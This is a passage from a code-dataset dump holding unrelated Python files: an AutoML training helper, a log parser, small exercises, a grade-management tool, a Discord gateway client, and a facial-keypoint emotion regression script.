val_loss_i\n if train_loss != False: \n if total_train_loss != 0: total_train_loss += train_loss_i\n else: total_train_loss = train_loss_i\n train_time += train_time_i\n if valid_fold_num == n:\n val_loss_list.append(total_val_loss/valid_fold_num)\n total_val_loss = valid_fold_num = 0\n elif time.time() - start_time >= budget:\n val_loss_list.append(total_val_loss/valid_fold_num)\n break\n val_loss = np.max(val_loss_list)\n if train_loss != False: train_loss = total_train_loss/n\n budget -= time.time() - start_time\n if val_loss < best_val_loss and budget > budget_per_train:\n estimator.cleanup()\n train_time_full = estimator.fit(X_train_all, y_train_all, budget)\n train_time += train_time_full\n return val_loss, train_loss, train_time\n\n\ndef compute_estimator(X_train, y_train, X_val, y_val, budget, kf,\n config_dic, objective_name, estimator_name, eval_method, eval_metric, \n best_val_loss = np.Inf, n_jobs=1, estimator_class=None, train_loss=False):\n start_time = time.time()\n estimator_class = estimator_class or get_estimator_class(\n objective_name, estimator_name)\n estimator = estimator_class(\n **config_dic, objective_name = objective_name, n_jobs=n_jobs)\n val_loss, train_loss, train_time = evaluate_model(\n estimator, X_train, y_train, X_val, y_val, budget, kf, objective_name, \n eval_method, eval_metric, best_val_loss, train_loss=train_loss)\n all_time = time.time() - start_time\n return estimator, val_loss, train_loss, train_time, all_time\n\n\ndef train_estimator(X_train, y_train, config_dic, objective_name,\n estimator_name, n_jobs=1, estimator_class=None, budget=None):\n start_time = time.time()\n estimator_class = estimator_class or get_estimator_class(objective_name,\n estimator_name)\n estimator = estimator_class(**config_dic, objective_name = objective_name,\n n_jobs=n_jobs)\n if X_train is not None:\n train_time = train_model(estimator, X_train, y_train, budget)\n else:\n estimator = estimator.estimator_class(**estimator.params)\n train_time = time.time() - start_time\n return estimator, train_time\n\n\ndef get_classification_objective(num_labels: int) -> str:\n if num_labels == 2:\n objective_name = 'binary:logistic'\n else:\n objective_name = 'multi:softmax'\n return 
objective_name\n\n\n","sub_path":"flaml/ml.py","file_name":"ml.py","file_ext":"py","file_size_in_byte":9710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"622008717","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 29 14:29:33 2019\n\n@author: xiongyi\n\"\"\"\nimport re\nimport numpy as np\n\nfilename = '/home/xiongyi/Codes/pytorch-pretrained-BERT/examples/11_06_00_02DeBERT_root.log'\nres = []\nwith open(filename ,'r') as fd:\n line = fd.readline() \n while (line):\n pear = re.findall(r\"Pearson = (.*),\", line)\n #print (pear)\n if (len(pear) >0):\n res.append(pear[0]) \n accs = re.findall(r\"Test acc : (.*) for (.*)\", line)\n if (len(accs) >0):\n #res.append(accs[0][1] + ':' + accs[0][0])\n res.append(accs[0][0])\n line = fd.readline() \ntasks = ['STS12', 'STS13', 'STS14', 'STS15', 'STS16',\n 'MR', 'CR', 'MPQA', 'SUBJ', 'SST2', 'SST5', 'TREC', 'MRPC',\n 'SICKEntailment', 'SICKRelatedness', 'STSBenchmark',\n 'Length', 'WordContent', 'Depth', 'TopConstituents',\n 'BigramShift', 'Tense', 'SubjNumber', 'ObjNumber',\n 'OddManOut', 'CoordinationInversion']\n#res_mat = np.asanyarray(heads)\n","sub_path":"examples/parse_result.py","file_name":"parse_result.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"275133739","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 10 05:50:23 2019\n\n@author: HP\n\"\"\"\n\"\"\"\nChallenge 2\n Screen is messy and rolls up\n Convert the code into a function \n\n MAJOR REFACTORING OF THE CODE\n\"\"\"\n\n\nimport random\n\n# word list at module scope so the Challenge 3 loop below can iterate over it too\nlist1=['mango','orange','grape','apple','lichi']\n\ndef game():\n sec=(random.choice(list1))\n print (sec)\n k=input (\" guess the word \")\n #if k is sec\n if k == sec:\n print (\"player wins\")\n else:\n print (\"computer wins\")\n \n\n\"\"\"\nChallenge 3\nRead the words from a file\n\n\"\"\"\nfor item in list1 :\n print (item)\n \n\n\"\"\"\nChallenge 4\n Get the list of Internet after web scraping\n\"\"\"\n\n ","sub_path":"day3/mini_project2.py","file_name":"mini_project2.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"417593817","text":"from subprocess import Popen, PIPE, STDOUT\r\n\r\n\r\n# Execute a command and print the shell output.\r\ndef ShellExecute(cmd, bSilent=False):\r\n p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT)\r\n output = p.stdout.read()\r\n if (not bSilent) and output:\r\n print(output)\r\n\r\n\r\nShellExecute('\"Premake5.exe\" --help')\r\ninput('')\r\n\r\n","sub_path":"Tools/Build/Premake/PremakeHelp.py","file_name":"PremakeHelp.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"569077864","text":"import os\n\ndef get_dirs(path):\n return [x for x in os.listdir(path) if os.path.isdir(path+x) ]\n\ndef get_filename(path,keyword):\n return [x for x in os.listdir(path) if os.path.isfile(path+x) and keyword in x ]\n\n\ndef get_all_dirs(path):\n results=[]\n current_level_dirs=get_dirs(path)\n\n current_level_dirs=list(map(lambda x:path+x+\"/\",current_level_dirs))\n results += current_level_dirs\n\n for i in current_level_dirs:\n results += get_all_dirs(i)\n\n return results\n\ndef search_keyword(keyword,path=\"./\"):\n dirs = get_all_dirs(path) + [path]\n for dir in dirs:\n files = 
get_filename(dir,keyword)\n for file in files:\n yield (dir+file)\n\nprint (\"############练习2#############\")\n\nfor i in search_keyword(\"000\"):\n print (i)\n\n","sub_path":"not_related/study/0011_os_module_study.py","file_name":"0011_os_module_study.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"230361123","text":"# Find all text on page\nimport urllib.request\n# url = \"https://leohxj.gitbooks.io/front-end-database/interview/skill-path.html\" # The website url you want to access\n# response = urllib.request.urlopen(url)\n# data = response.read()\n# text = data.decode('utf-8-sig')\n# print(text)\n\n# Find target text\nfrom bs4 import BeautifulSoup\n\n# The website url you want to access\ndef downLoad():\n url = \"https://leohxj.gitbooks.io/front-end-database/interview/skill-path.html\"\n# Get HTML text\n response = urllib.request.urlopen(url)\n data = response.read()\n text = data.decode('utf-8-sig')\n return text\n\n# Export text\nprint(\"downloading.. \")\nprint(\"=============================\")\ntext = downLoad()\n\n# Target define\nsoup = BeautifulSoup(text, \"lxml\") # parse\n# get all list\nlistIdxs = soup.body.find_all('li', attrs={'class':'data-level'}) # get all list\nfor listIdx in listIdxs:\n targets = soup.body.find_all('a', attrs={'class':'chapter', listIdx :'title'+listIdx.text})\n for ta in targets:\n print(ta.text)\n","sub_path":"v2_otherSite.py","file_name":"v2_otherSite.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"132556680","text":"# coding:utf-8\n\"\"\"\n Time : 2021/1/27 下午3:56\n Author : vincent\n FileName: urls\n Software: PyCharm\n Last Modified by: vincent\n Last Modified time: 2021/1/27 下午3:56\n\"\"\"\nfrom django.conf.urls import url\n\nfrom drugstore import views\n\nurlpatterns = [\n url(r'^index/', views.index, name='index'),\n url(r'^shopholic/', views.shopholic_index, name='shopholic_index'),\n url(r'^login/', views.login, name='login'),\n url(r'^register/', views.register, name='register'),\n\n]","sub_path":"zhyf/drugstore/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"329182668","text":"import random\r\nlist_zmw=['_']\r\nfor i in range(10):\r\n list_zmw.append(str(i))\r\nfor i in range(65,91):\r\n list_zmw.append(str(chr(i)))\r\nfor i in range(97,123):\r\n list_zmw.append(str(chr(i)))\r\nfile=open('C:/Users/Administrator/PycharmProjects/new/第一月检测/账号密码.txt','w')\r\nfile.write('用户名\\t\\t密码\\n')\r\nfile.close()\r\nfile=open('C:/Users/Administrator/PycharmProjects/new/第一月检测/账号密码.txt','a')\r\ncount=0\r\nwhile count<10:\r\n user_zmw= ''\r\n pwd_zmw=''\r\n for i in range(6):\r\n s=random.randint(0, len(list_zmw) - 1)\r\n user_zmw= user_zmw + str(list_zmw[s])\r\n for i in range(6):\r\n s=random.randint(0, len(list_zmw) - 1)\r\n pwd_zmw= pwd_zmw + str(list_zmw[s])\r\n file.write(user_zmw + '\\t\\t'+pwd_zmw+'\\n')\r\n count+=1\r\nfile.close()\r\ndef w_zmw(func):\r\n def inner_zmw(user,pwd):\r\n func(user,pwd)\r\n read = open('C:/Users/Administrator/PycharmProjects/new/第一月检测/账号密码.txt', 'r')\r\n while True:\r\n text=read.readline()\r\n if len(text)==0:\r\n break\r\n text=text.replace(\"\\n\",'')\r\n text=text.split(\"\\t\\t\")\r\n if text[0]==user and text[1]==pwd:\r\n return '登录成功'\r\n\r\n return '登录失败,请确认账号或者密码是否正确'\r\n return 
inner_zmw\r\n@w_zmw\r\ndef login_zmw(user,pwd):\r\n try:\r\n\r\n for i in user:\r\n if i not in list_zmw:\r\n raise Exception\r\n\r\n for i in pwd:\r\n if i not in list_zmw:\r\n raise Exception\r\n except:\r\n print('请不要输入汉字!')\r\nlist = []\r\ndef paixu():\r\n list_pai = []\r\n read_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'r')\r\n while True:\r\n test=read_grade.readline()\r\n if len(test)==0:\r\n break\r\n if test[:2]=='姓名':\r\n test = read_grade.readline()\r\n test=test.replace('\\n','')\r\n a=test.split(\"\\t\\t\")\r\n list_pai.append(a)\r\n #print(list_pai)\r\n read_grade.close()\r\n num=len(list_pai)\r\n for m in range(len(list_pai)):\r\n for n in range(len(list_pai) - m - 1):\r\n if int(list_pai[n][4]) < int(list_pai[n+1][4]):\r\n temp = list_pai[n]\r\n list_pai[n] = list_pai[n + 1]\r\n list_pai[n + 1] = temp\r\n list_pai[len(list_pai)-m-1][5]=str(num)\r\n num -= 1\r\n\r\n #print(list_pai)\r\n wp_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'w')\r\n wp_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'a')\r\n wp_grade.write('姓名\\t语文\\t数学\\t英语\\t总分\\t名次\\n')\r\n for i in list_pai:\r\n wp_grade.write(i[0]+'\\t\\t'+i[1]+'\\t\\t'+i[2]+'\\t\\t'+i[3]+'\\t\\t'+i[4]+'\\t\\t'+i[5]+'\\n')\r\n wp_grade.close()\r\ndef show_menu():\r\n print('*' * 50)\r\n print(\"欢迎使用【成绩管理系统】V1.0\")\r\n print(\"1. 录入成绩\")\r\n print(\"2. 显示全部\")\r\n print(\"3. 查询成绩\")\r\n print(\"0. 退出系统\")\r\n print('*' * 50)\r\n\r\n\r\ndef new_grade():\r\n print(\"-\" * 50)\r\n print(\"功能:录入成绩\")\r\n name = input(\"请输入姓名:\")\r\n try:\r\n read_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'r')\r\n read_grade.close()\r\n except:\r\n write_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'w')\r\n write_grade.write('姓名\\t语文\\t数学\\t英语\\t总分\\t名次\\n')\r\n write_grade.close()\r\n read_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'r')\r\n while True:\r\n new_read = read_grade.readline()\r\n if len(new_read) == 0:\r\n break\r\n if name == new_read[:len(name)]:\r\n print('该姓名已存在,请重新输入')\r\n name = input(\"请输入姓名:\")\r\n read_grade.close()\r\n read_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'r')\r\n while True:\r\n try:\r\n chinese = input(\"请输入语文成绩:\")\r\n maths = input(\"请数学成绩:\")\r\n english = input(\"请输入英语成绩:\")\r\n zong = int(chinese) + int(maths) + int(english)\r\n break\r\n except:\r\n print('请确保成绩是数字')\r\n dict = {'name': name, 'Chinese': chinese, 'Maths': maths, 'English': english, 'zong': str(zong)}\r\n list.append(dict)\r\n write_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'a')\r\n write_grade.write(\r\n dict['name'] + '\\t\\t' + dict['Chinese'] + '\\t\\t' + dict['Maths'] + '\\t\\t' + dict['English'] + '\\t\\t' + dict[\r\n 'zong'] +'\\t\\t'+ '\\n')\r\n read_grade.close()\r\n write_grade.close()\r\n\r\n # print(list)\r\n print(\"成功添加%s的成绩,具体信息如下:\" % dict['name'])\r\n for i in ['姓名', '语文', '数学', '英语', '总分']:\r\n print(i, end='\\t')\r\n print()\r\n print(\"%s\\t\\t%s\\t\\t%s\\t\\t%s\\t\\t%s\" % (dict['name'], dict['Chinese'], dict['Maths'], dict['English'],dict['zong']))\r\n paixu()\r\n over = input(\"输入任意键回到主菜单:\")\r\n\r\n\r\ndef show_all():\r\n print(\"-\" * 50)\r\n print(\"功能:显示全部\")\r\n try:\r\n read_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'r')\r\n text = read_grade.read()\r\n print(text)\r\n read_grade.close()\r\n except:\r\n 
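# this bare except fires when the grades file cannot be opened, i.e. no records have been entered yet\r\n 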
print('现在没有任何记录,请先录入成绩再来查询')\r\n over = input(\"输入任意键回到主菜单:\")\r\n\r\n\r\ndef search_grade():\r\n print(\"-\" * 50)\r\n print(\"功能:查询成绩\")\r\n try:\r\n\r\n read_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'r')\r\n read_grade2 = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'r')\r\n text2 = read_grade2.read()\r\n\r\n write_grade2 = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩副本.txt\", 'w')\r\n write_grade1 = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩修改.txt\", 'w')\r\n write_grade1 = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩修改.txt\", 'a')\r\n write_grade2.write(text2)\r\n read_grade2.close()\r\n write_grade2.close()\r\n file_name = input(\"请输入你要查询的姓名:\")\r\n count = 0\r\n while True:\r\n text = read_grade.readline()\r\n if len(text) == 0:\r\n break\r\n if file_name == text[:len(file_name)]:\r\n count = 1\r\n for i in ['姓名', '语文', '数学', '英语', '总分','名次']:\r\n print(i, end='\\t')\r\n print()\r\n print(text)\r\n\r\n def deal(action):\r\n if action == '1':\r\n print(\"开始修改,如果此项不修改直接回车则默认为原来数据.\")\r\n\r\n def input_grade_info(dict_value, tip_message):\r\n result_str = input(tip_message)\r\n if len(result_str) > 0:\r\n return result_str\r\n else:\r\n return dict_value\r\n\r\n dname = file_name\r\n student_name = input_grade_info(file_name, \"请输入姓名:\")\r\n w_grade2 = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩副本.txt\", 'a')\r\n w_grade2.write(student_name)\r\n w_grade2.close()\r\n count = 0\r\n read_grade2 = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩副本.txt\", 'r')\r\n while True:\r\n text2 = read_grade2.readline()\r\n\r\n if len(text2) == 0:\r\n break\r\n if text2[:len(student_name)] == dname:\r\n text2 = read_grade2.readline()\r\n if student_name == text2[:len(student_name)]:\r\n count += 1\r\n if count == 2:\r\n count = 0\r\n print('姓名已存在,请重新修改')\r\n student_name = dname\r\n read_grade2.close()\r\n w_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩副本.txt\", 'w')\r\n r = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'r')\r\n chong = r.read()\r\n w_grade.write(chong)\r\n w_grade.close()\r\n read_grade2 = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩副本.txt\", 'r')\r\n student_name = input_grade_info(file_name, \"请输入姓名:\")\r\n w_grade2 = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩副本.txt\", 'a')\r\n w_grade2.write(student_name)\r\n w_grade2.close()\r\n read_grade2.close()\r\n while True:\r\n try:\r\n student_chinese = input(\"请输入语文成绩:\")\r\n student_maths = input(\"请输入数学成绩:\")\r\n student_english = input(\"请输入英语成绩:\")\r\n student_zong = int(student_chinese) + int(student_maths) + int(student_english)\r\n break\r\n except:\r\n print('请确保成绩是数字')\r\n write_grade1.write(\r\n student_name + '\\t\\t' + student_chinese + '\\t\\t' + student_maths + '\\t\\t' + student_english + '\\t\\t' + str(student_zong) +'\\t\\t'+ '\\n')\r\n print(\"成绩修改成功,新纪录如下所示:\")\r\n for i in ['姓名', '语文', '数学', '英语', '总分']:\r\n print(i, end='\\t')\r\n print()\r\n print(\r\n student_name + '\\t\\t' + student_chinese + '\\t\\t' + student_maths + '\\t\\t' + student_english + '\\t\\t' + str(student_zong))\r\n over = input(\"输入任意键回到主菜单:\")\r\n elif action == '2':\r\n print(\"删除成功\")\r\n over = input(\"输入任意键回到主菜单:\")\r\n return\r\n elif action == '0':\r\n write_grade1.write(text)\r\n return\r\n else:\r\n print(\"输入错误请重新输入\")\r\n\r\n action = input(\"请输入请选择要执行的操作[1] 修改 [2] 删除 [0] 返回主菜单\")\r\n deal(action)\r\n 
else:\r\n write_grade1.write(text)\r\n read_grade.close()\r\n write_grade1.close()\r\n read = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩修改.txt\", 'r')\r\n write = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'w')\r\n # write.write('姓名 语文 数学 英语\\n')\r\n test = read.read()\r\n write.write(test)\r\n read.close()\r\n write.close()\r\n paixu()\r\n if count == 0:\r\n print(\"%s没有录入成绩\" % file_name)\r\n over = input(\"输入任意键回到主菜单:\")\r\n return\r\n\r\n print(\"%s没有录入成绩\" % file_name)\r\n over = input(\"输入任意键回到主菜单:\")\r\n except:\r\n print('现在没有任何记录,请先录入成绩再来查询')\r\n over = input(\"输入任意键回到主菜单:\")\r\n return\r\n","sub_path":"第一月项目/grade_tools.py","file_name":"grade_tools.py","file_ext":"py","file_size_in_byte":12589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"65380634","text":"'''\n We know the content of the evaporator (content in ml), the percentage of foam\n or gas lost every day (evap_per_day) and the threshold (threshold)\n in percentage beyond which the evaporator is no longer useful.\n All numbers are strictly positive.\n\n The program reports the nth day (as an integer) on which the evaporator\n will be out of use.\n\n Simplly says: calculate the life cycle when the content still useful.\n Threshold is the percentage of content that is not useful\n'''\ndef evaporator(content,evap_per_day, threshold):\n count=0\n test = content\n while test>= (content * threshold)/100.0:\n test = test- (test * 0.01 * evap_per_day)\n count+=1\n\n return count\n\nprint(evaporator(10,10,10))","sub_path":"python/evaporator.py","file_name":"evaporator.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"171765455","text":"#!/Users/geert/opt/anaconda3/bin/python3\n\ndef count_unique_answers_for_group(g):\n return len(set(g.replace(\"\\n\",\"\")))\n\ndef count_all_answers_for_group(g):\n # for group g, find which answer was given by all\n answers = list(map(set,g.split(\"\\n\")))\n all_given = answers[0].intersection(*answers)\n return len(all_given)\n\nif __name__ == \"__main__\":\n testinput = \"\"\"abc\n\na\nb\nc\n\nab\nac\n\na\na\na\na\n\nb\"\"\"\n import re\n testgroups = re.split(\"\\n\\n\", testinput)\n assert 11 == sum(map(count_unique_answers_for_group,testgroups)), \"test case 1 failed\"\n \n from aoc_utils import load_list\n groups = load_list(\"input/d06_pt1.txt\",\"\\n\\n\")\n # print(groups)\n \n ans1 = sum(map(count_unique_answers_for_group, groups))\n print(f\"Answer part 1: {ans1}\")\n \n ## Part 2\n assert 6 == sum(map(count_all_answers_for_group, testgroups)), \"test case 2 failed\"\n \n ans2 = sum(map(count_all_answers_for_group, groups))\n print(f\"Answer part 2: {ans2}\")","sub_path":"day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"2182211","text":"import websockets, asyncio, json, threading\n\nfrom colorama import Fore, init\ninit(convert=True)\n\ntoken = ''\n\nclass Client:\n def __init__(self, token: str):\n self.token = token\n self.heartbeat = None\n self.socket = None\n self.sessionID = None\n self.seq = None\n \n async def resume(self):\n if self.socket == None:\n return\n\n if self.socket.close_code == 1001:\n await self.send(json.dumps({\n \"token\": token,\n \"session_id\": self.sessionID,\n \"seq\": self.seq\n }))\n\n async def connect(self):\n self.socket = 
await websockets.connect(\"wss://gateway.discord.gg/?encoding=json&v=6\")\n self.heartbeat = json.loads((await self.socket.recv()))['d']['heartbeat_interval']\n\n async def identify(self):\n if self.socket == None:\n await self.connect()\n\n await self.socket.send(json.dumps({\n \"op\":2,\n \"d\": { \n \"token\": token,\n \"properties\":{\n \"os\":\"MomOS\",\n \"browser\":\"Pixels\",\n \"device\":\"\",\n \"browser_user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36\",\n \"os_version\":\"xp\"\n }\n }}))\n\n self.sessionID = json.loads(await self.socket.recv())['d']['session_id']\n\n async def send(self, _data: json.dumps):\n if self.socket == None:\n await self.identify()\n \n await self.socket.send(_data)\n\n print(Fore.GREEN + await self.socket.recv() + \"\\n\")\n\n async def messages(self):\n if self.socket == None:\n await self.identify()\n\n while True:\n _data = (await self.socket.recv())\n self.seq = json.loads(_data)['s']\n print( Fore.CYAN + _data + \"\\n\")\n\nasyncio.run(Client(token).messages())\n","sub_path":"SocketClient/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"156474729","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n# os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"2\"\n\nimport numpy as np\nimport keras\n## VGGFACE MODEL\nfrom keras.engine import Model\nfrom keras.layers import Concatenate, Add, Dropout, Flatten, Dense, Input, GlobalAveragePooling2D, GaussianDropout\nfrom keras.preprocessing import image\nfrom keras_vggface.vggface import VGGFace\nfrom keras_vggface import utils\nfrom keras.callbacks import ModelCheckpoint\n\nfrom keras.models import load_model\nfrom keras.regularizers import l2\n\n\nfrom keras.datasets import cifar10\nimport matplotlib.pyplot as plt\nimport cv2\n\nimport sys\nsys.path.insert(0, '../data/')\nfrom data import read_preprocessed_face_data\n\nfrom myutils import my_ccc_loss, siamese_kpts_generator, myeval, prewhiten, get_aligned_indexes, preds2csv\nimport pandas as pd\nimport collections\nimport itertools\n\nnp.random.seed(1337)\n__VIDEO_SEQ_LEN__ = 9\n__N_CLASSES__ = 7\n__EMOTIONS__ = True\n\n__RES_FN__ = '/data/pmmf/OMG/KPTS/grid_wo_norm_mlayers_test/'\n__MODELS_FN__ = '/data/pmmf/OMG/KPTS/grid_wo_norm_mlayers/'\n\nif not os.path.exists(__RES_FN__):\n os.makedirs(__RES_FN__)\n\nfrom keras import backend as K\nprint('image_data_format: ', K.image_data_format())\n\n\ndef myfit(model, x_train, y_train, x_val, y_val, lr=1e-04, loss_weights={'out_arousal': 1., 'out_valence': 1}, epochs=4, batch_size=64, weightspath=\"./tmp/weights_top.hdf5\"):\n \n if __EMOTIONS__:\n # compile model \n model.compile(optimizer=keras.optimizers.Adam(lr=lr), \n loss={'out_arousal': my_ccc_loss, 'out_valence': my_ccc_loss, 'out_categorical': keras.losses.categorical_crossentropy},\n loss_weights=loss_weights)\n else:\n # compile model \n model.compile(optimizer=keras.optimizers.Adam(lr=lr), \n loss={'out_arousal': my_ccc_loss, 'out_valence': my_ccc_loss},\n loss_weights=loss_weights)\n\n # checkpoint\n checkpoint = ModelCheckpoint(weightspath, monitor='val_loss', verbose=1, save_best_only=True, mode='min')\n callbacks_list = [checkpoint]\n\n # generators\n gen_train = siamese_kpts_generator(x_train, y_train, batch_size, augmentation=True, emotions=__EMOTIONS__)\n gen_val = 
siamese_kpts_generator(x_val, y_val, batch_size, augmentation=False, emotions=__EMOTIONS__)\n\n x_train_len = x_train['frame_0'].shape[0]\n x_val_len = x_val['frame_0'].shape[0]\n\n \n # fit\n model.summary()\n model.fit_generator(gen_train,\n epochs=epochs,\n validation_data=gen_val,\n verbose=1,\n steps_per_epoch=(x_train_len/batch_size),\n validation_steps=(x_val_len/batch_size),\n callbacks=callbacks_list)\n\n\n model.load_weights(weightspath)\n\n return model\n\ndef siamese_encoder(input_shape, n_dense=2, hidden_dim=256, l2_reg=1e-04):\n base = base_encoder(input_shape, hidden_dim, l2_reg)\n inputs = [Input(shape=input_shape, name='frame_'+str(i)) for i in range(__VIDEO_SEQ_LEN__)]\n\n shared_streams = [base(i) for i in inputs]\n x = Concatenate()(shared_streams)\n for i in range(n_dense):\n name='fc' + str(i + 3)\n x = Dense(hidden_dim//4, activation='relu', kernel_regularizer=l2(l2_reg), name=name)(x)\n x = Dropout(0.4)(x)\n out_arousal = Dense(1, activation='sigmoid', name='out_arousal')(x)\n out_valence = Dense(1, activation='tanh', name='out_valence')(x)\n if __EMOTIONS__:\n out_categorical = Dense(__N_CLASSES__, activation='softmax', name='out_categorical')(x)\n siamese_encoder = Model(inputs, [out_arousal, out_valence, out_categorical])\n else:\n siamese_encoder = Model(inputs, [out_arousal, out_valence])\n siamese_encoder.summary()\n return siamese_encoder\n\ndef base_encoder(input_shape, hidden_dim, l2_reg):\n input = Input(shape=input_shape)\n x = Dense(hidden_dim, activation='relu', input_shape=input_shape, kernel_regularizer=l2(l2_reg))(input)\n x = Dense(hidden_dim//2, activation='relu', kernel_regularizer=l2(l2_reg))(x)\n return Model(input, x)\n\ndef mydiff(d):\n diff = {}\n for ii in range(1, __VIDEO_SEQ_LEN__):\n if ii == 1:\n diff['frame_0'] = d['frame_'+str(ii)] - d['frame_'+str(ii-1)]\n diff['frame_'+str(ii)] = d['frame_'+str(ii)] - d['frame_'+str(ii-1)]\n return diff\n\n## READ DATA\ntrain_fn = '../pre-process/Train_face_data.pckl'\nval_fn = '../pre-process/Validation_face_data.pckl'\ntest_fn = '../pre-process/Test_face_data.pckl'\n\nx_train, kpts_train, arousal_train, valence_train, emotion_train, groups_train, folder_train, \\\nx_val, kpts_val, arousal_val, valence_val, emotion_val, groups_val, folder_val, \\\nx_test, kpts_test, groups_test, folder_test = read_preprocessed_face_data(train_fn, val_fn, test_fn=test_fn)\n\nx_train_len = x_train.shape[0] / __VIDEO_SEQ_LEN__\nx_val_len = x_val.shape[0] / __VIDEO_SEQ_LEN__\nx_test_len = x_test.shape[0] / __VIDEO_SEQ_LEN__\n\ntrain_gt_fn = '/data/DB/OMG/omg_TrainVideos.csv'\nval_gt_fn = '/data/DB/OMG/omg_ValidationVideos.csv'\ntest_gt_fn = '/data/DB/OMG/omg_TestVideos_WithoutLabels.csv'\naligned_val_indexes, gt_arousal, gt_valence = get_aligned_indexes(val_gt_fn, folder_val)\naligned_test_indexes = get_aligned_indexes(test_gt_fn, folder_test, test=True)\n\n## COMPUTE KPTS-FEATS\nfrom feat_kpts_geometry import feat_kpts_geometry\nfrom sklearn.preprocessing import StandardScaler\n\nfeat_kpts = feat_kpts_geometry()\n# train\ntrain_feats = feat_kpts.describe(kpts_train)\nscaler = StandardScaler()\nscaler.fit(train_feats)\ntrain_feats = scaler.transform(train_feats)\n\n# val\nval_feats = feat_kpts.describe(kpts_val)\nval_feats = scaler.transform(val_feats)\n\n# test\ntest_feats = feat_kpts.describe(kpts_test)\ntest_feats = scaler.transform(test_feats)\n\n## PRE-PROCESSING\nx_train = x_train.astype('float32') / 255\nx_val = x_val.astype('float32') / 255\nx_test = x_test.astype('float32') / 255\n\nkpts_train = 
kpts_train.astype('float32') / 96\nkpts_val = kpts_val.astype('float32') / 96\nkpts_test = kpts_test.astype('float32') / 96\n\nkpts_train_siamese = dict(('frame_'+str(i), kpts_train[i::__VIDEO_SEQ_LEN__,:,:2].reshape(-1, 68*2)) for i in range(__VIDEO_SEQ_LEN__))\nkpts_val_siamese = dict(('frame_'+str(i), kpts_val[i::__VIDEO_SEQ_LEN__,:,:2].reshape(-1, 68*2)) for i in range(__VIDEO_SEQ_LEN__))\nkpts_test_siamese = dict(('frame_'+str(i), kpts_test[i::__VIDEO_SEQ_LEN__,:,:2].reshape(-1, 68*2)) for i in range(__VIDEO_SEQ_LEN__))\n\ntrain_feats_siamese = dict(('frame_'+str(i), train_feats[i::__VIDEO_SEQ_LEN__,:]) for i in range(__VIDEO_SEQ_LEN__))\nval_feats_siamese = dict(('frame_'+str(i), val_feats[i::__VIDEO_SEQ_LEN__,:]) for i in range(__VIDEO_SEQ_LEN__))\ntest_feats_siamese = dict(('frame_'+str(i), test_feats[i::__VIDEO_SEQ_LEN__,:]) for i in range(__VIDEO_SEQ_LEN__))\n\n\ndiff_train = mydiff(kpts_train_siamese)\ndiff_val = mydiff(kpts_val_siamese)\ndiff_test = mydiff(kpts_test_siamese)\n\ndiff2_train = mydiff(mydiff(kpts_train_siamese))\ndiff2_val = mydiff(mydiff(kpts_val_siamese))\ndiff2_test = 